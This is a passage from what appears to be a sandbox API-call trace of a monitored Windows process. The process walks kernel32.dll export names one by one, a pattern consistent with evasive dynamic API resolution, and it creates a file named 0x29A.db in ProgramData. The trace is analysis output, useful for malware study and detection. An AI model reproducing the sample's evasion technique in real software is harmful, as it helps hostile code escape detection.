lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0051.659] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0051.659] lstrcpyA (in: lpString1=0xc9d320, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0051.659] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0051.659] lstrcpyA (in: lpString1=0xc9d320, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0051.659] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0051.659] lstrcpyA (in: lpString1=0xc9d320, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0051.659] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0051.660] lstrcpyA (in: lpString1=0xc9d320, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0051.660] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0051.660] lstrcpyA (in: lpString1=0xc9d320, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0051.660] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0051.660] lstrcpyA (in: lpString1=0xc9d320, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0051.660] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0051.660] lstrcpyA (in: lpString1=0xc9d320, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0051.660] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0051.660] lstrcpyA (in: lpString1=0xc9d320, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0051.660] lstrlenA (lpString="CANCELIO") returned 8 [0051.660] lstrcpyA (in: lpString1=0xc9d320, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0051.660] lstrlenA (lpString="CANCELIOEX") returned 10 [0051.660] lstrcpyA (in: lpString1=0xc9d320, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0051.660] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0051.660] lstrcpyA (in: lpString1=0xc9d320, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0051.660] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0051.660] lstrcpyA (in: lpString1=0xc9d320, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0051.660] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0051.660] lstrcpyA (in: lpString1=0xc9d320, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0051.660] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0051.660] lstrcpyA (in: lpString1=0xc9d320, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0051.660] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0051.660] lstrcpyA (in: lpString1=0xc9d320, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0051.660] lstrlenA (lpString="CHECKELEVATION") returned 14 [0051.660] lstrcpyA (in: lpString1=0xc9d320, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0051.660] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0051.660] lstrcpyA (in: lpString1=0xc9d320, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0051.660] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0051.660] lstrcpyA (in: lpString1=0xc9d320, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0051.660] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0051.660] lstrcpyA (in: lpString1=0xc9d320, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0051.660] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0051.660] lstrcpyA (in: lpString1=0xc9d320, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0051.660] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0051.660] lstrcpyA (in: lpString1=0xc9d320, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0051.660] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0051.660] lstrcpyA (in: lpString1=0xc9d320, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0051.660] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0051.660] lstrcpyA (in: lpString1=0xc9d320, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0051.661] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0051.661] lstrcpyA (in: lpString1=0xc9d320, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0051.661] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0051.661] lstrcpyA (in: lpString1=0xc9d320, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0051.661] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0051.661] lstrcpyA (in: lpString1=0xc9d320, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0051.661] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0051.661] lstrcpyA (in: lpString1=0xc9d320, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0051.661] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0051.661] lstrcpyA (in: lpString1=0xc9d320, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0051.661] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0051.661] lstrcpyA (in: lpString1=0xc9d320, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0051.661] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0051.661] lstrcpyA (in: lpString1=0xc9d320, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0051.661] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0051.661] lstrcpyA (in: lpString1=0xc9d320, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0051.661] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0051.661] lstrcpyA (in: lpString1=0xc9d320, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0051.661] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0051.661] lstrcpyA (in: lpString1=0xc9d320, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0051.661] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0051.661] lstrcpyA (in: lpString1=0xc9d320, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0051.661] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0051.661] lstrcpyA (in: lpString1=0xc9d320, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0051.661] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0051.661] lstrcpyA (in: lpString1=0xc9d320, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0051.661] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0051.661] lstrcpyA (in: lpString1=0xc9d320, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0051.661] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0051.661] lstrcpyA (in: lpString1=0xc9d320, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0051.661] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0051.661] lstrcpyA (in: lpString1=0xc9d320, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0051.661] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0051.661] lstrcpyA (in: lpString1=0xc9d320, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0051.661] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0051.661] lstrcpyA (in: lpString1=0xc9d320, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0051.661] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0051.661] lstrcpyA (in: lpString1=0xc9d320, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0051.662] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0051.662] lstrcpyA (in: lpString1=0xc9d320, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0051.662] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0051.662] lstrcpyA (in: lpString1=0xc9d320, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0051.662] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0051.662] lstrcpyA (in: lpString1=0xc9d320, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0051.662] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0051.662] lstrcpyA (in: lpString1=0xc9d320, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0051.662] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0051.662] lstrcpyA (in: lpString1=0xc9d320, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0051.662] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0051.662] lstrcpyA (in: lpString1=0xc9d320, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0051.662] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0051.662] lstrcpyA (in: lpString1=0xc9d320, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0051.662] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0051.662] lstrcpyA (in: lpString1=0xc9d320, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0051.662] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0051.662] lstrcpyA (in: lpString1=0xc9d320, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0051.662] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0051.662] lstrcpyA (in: lpString1=0xc9d320, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0051.662] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0051.662] lstrcpyA (in: lpString1=0xc9d320, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0051.662] lstrlenA (lpString="COPYCONTEXT") returned 11 [0051.662] lstrcpyA (in: lpString1=0xc9d320, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0051.662] lstrlenA (lpString="COPYFILEA") returned 9 [0051.662] lstrcpyA (in: lpString1=0xc9d320, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0051.662] lstrlenA (lpString="COPYFILEEXA") returned 11 [0051.662] lstrcpyA (in: lpString1=0xc9d320, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0051.662] lstrlenA (lpString="COPYFILEEXW") returned 11 [0051.662] lstrcpyA (in: lpString1=0xc9d320, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0051.662] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0051.662] lstrcpyA (in: lpString1=0xc9d320, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0051.662] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0051.662] lstrcpyA (in: lpString1=0xc9d320, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0051.662] lstrlenA (lpString="COPYFILEW") returned 9 [0051.662] lstrcpyA (in: lpString1=0xc9d320, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0051.662] lstrlenA (lpString="COPYLZFILE") returned 10 [0051.662] lstrcpyA (in: lpString1=0xc9d320, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0051.662] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0051.662] lstrcpyA (in: lpString1=0xc9d320, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0051.663] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0051.663] lstrcpyA (in: lpString1=0xc9d320, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0051.663] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0051.663] lstrcpyA (in: lpString1=0xc9d320, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0051.663] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0051.663] lstrcpyA (in: lpString1=0xc9d320, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0051.663] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0051.663] lstrcpyA (in: lpString1=0xc9d320, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0051.663] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0051.663] lstrcpyA (in: lpString1=0xc9d320, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0051.663] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0051.663] lstrcpyA (in: lpString1=0xc9d320, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0051.663] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0051.663] lstrcpyA (in: lpString1=0xc9d320, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0051.663] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0051.663] lstrcpyA (in: lpString1=0xc9d320, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0051.663] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0051.663] lstrcpyA (in: lpString1=0xc9d320, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0051.663] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0051.663] lstrcpyA (in: lpString1=0xc9d320, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0051.663] lstrlenA (lpString="CREATEEVENTA") returned 12 [0051.663] lstrcpyA (in: lpString1=0xc9d320, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0051.663] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0051.663] lstrcpyA (in: lpString1=0xc9d320, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0051.663] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0051.663] lstrcpyA (in: lpString1=0xc9d320, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0051.663] lstrlenA (lpString="CREATEEVENTW") returned 12 [0051.663] lstrcpyA (in: lpString1=0xc9d320, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0051.663] lstrlenA (lpString="CREATEFIBER") returned 11 [0051.663] lstrcpyA (in: lpString1=0xc9d320, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0051.663] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0051.663] lstrcpyA (in: lpString1=0xc9d320, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0051.663] lstrlenA (lpString="CREATEFILEA") returned 11 [0051.663] lstrcpyA (in: lpString1=0xc9d320, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0051.663] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0051.663] lstrcpyA (in: lpString1=0xc9d320, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0051.665] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0051.665] lstrcpyA (in: lpString1=0xc9d320, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0051.665] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0051.665] lstrcpyA (in: lpString1=0xc9d320, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0051.665] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0051.665] lstrcpyA (in: lpString1=0xc9d320, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0051.665] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0051.665] lstrcpyA (in: lpString1=0xc9d320, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0051.665] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0051.665] lstrcpyA (in: lpString1=0xc9d320, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0051.665] lstrlenA (lpString="CREATEFILEW") returned 11 [0051.665] CreateFileW (lpFileName="C:\\ProgramData\\0x29A.db" (normalized: "c:\\programdata\\0x29a.db"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0051.666] lstrlenA (lpString="kernel32.dll") returned 12 [0051.666] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0051.666] lstrcpyA (in: lpString1=0xc9d338, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0051.666] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0051.666] lstrcpyA (in: lpString1=0xc9d338, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0051.666] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0051.667] lstrcpyA (in: lpString1=0xc9d338, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0051.667] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0051.667] lstrcpyA (in: lpString1=0xc9d338, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0051.667] lstrlenA (lpString="ADDATOMA") returned 8 [0051.667] lstrcpyA (in: lpString1=0xc9d338, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0051.667] lstrlenA (lpString="ADDATOMW") returned 8 [0051.667] lstrcpyA (in: lpString1=0xc9d338, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0051.667] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0051.667] lstrcpyA (in: lpString1=0xc9d338, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0051.667] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0051.667] lstrcpyA (in: lpString1=0xc9d338, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0051.667] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0051.667] lstrcpyA (in: lpString1=0xc9d338, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0051.667] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0051.667] lstrcpyA (in: lpString1=0xc9d338, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0051.667] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0051.667] lstrcpyA (in: lpString1=0xc9d338, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0051.667] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0051.667] lstrcpyA (in: lpString1=0xc9d338, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0051.667] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0051.667] lstrcpyA (in: lpString1=0xc9d338, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0051.667] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0051.667] lstrcpyA (in: lpString1=0xc9d338, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0051.667] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0051.667] lstrcpyA (in: lpString1=0xc9d338, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0051.667] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0051.667] lstrcpyA (in: lpString1=0xc9d338, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0051.667] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0051.667] lstrcpyA (in: lpString1=0xc9d338, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0051.667] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0051.667] lstrcpyA (in: lpString1=0xc9d338, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0051.667] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0051.667] lstrcpyA (in: lpString1=0xc9d338, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0051.667] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0051.667] lstrcpyA (in: lpString1=0xc9d338, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0051.667] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0051.667] lstrcpyA (in: lpString1=0xc9d338, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0051.667] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0051.667] lstrcpyA (in: lpString1=0xc9d338, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0051.667] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0051.667] lstrcpyA (in: lpString1=0xc9d338, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0051.668] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0051.668] lstrcpyA (in: lpString1=0xc9d338, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0051.668] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0051.668] lstrcpyA (in: lpString1=0xc9d338, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0051.668] lstrlenA (lpString="BACKUPREAD") returned 10 [0051.668] lstrcpyA (in: lpString1=0xc9d338, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0051.668] lstrlenA (lpString="BACKUPSEEK") returned 10 [0051.668] lstrcpyA (in: lpString1=0xc9d338, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0051.668] lstrlenA (lpString="BACKUPWRITE") returned 11 [0051.668] lstrcpyA (in: lpString1=0xc9d338, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0051.668] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0051.668] lstrcpyA (in: lpString1=0xc9d338, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0051.668] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0051.668] lstrcpyA (in: lpString1=0xc9d338, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0051.668] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0051.668] lstrcpyA (in: lpString1=0xc9d338, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0051.668] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0051.668] lstrcpyA (in: lpString1=0xc9d338, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0051.668] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0051.668] lstrcpyA (in: lpString1=0xc9d338, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0051.668] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0051.668] lstrcpyA (in: lpString1=0xc9d338, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0051.668] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0051.668] lstrcpyA (in: lpString1=0xc9d338, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0051.668] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0051.668] lstrcpyA (in: lpString1=0xc9d338, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0051.668] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0051.668] lstrcpyA (in: lpString1=0xc9d338, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0051.668] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0051.668] lstrcpyA (in: lpString1=0xc9d338, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0051.668] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0051.668] lstrcpyA (in: lpString1=0xc9d338, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0051.668] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0051.668] lstrcpyA (in: lpString1=0xc9d338, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0051.668] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") 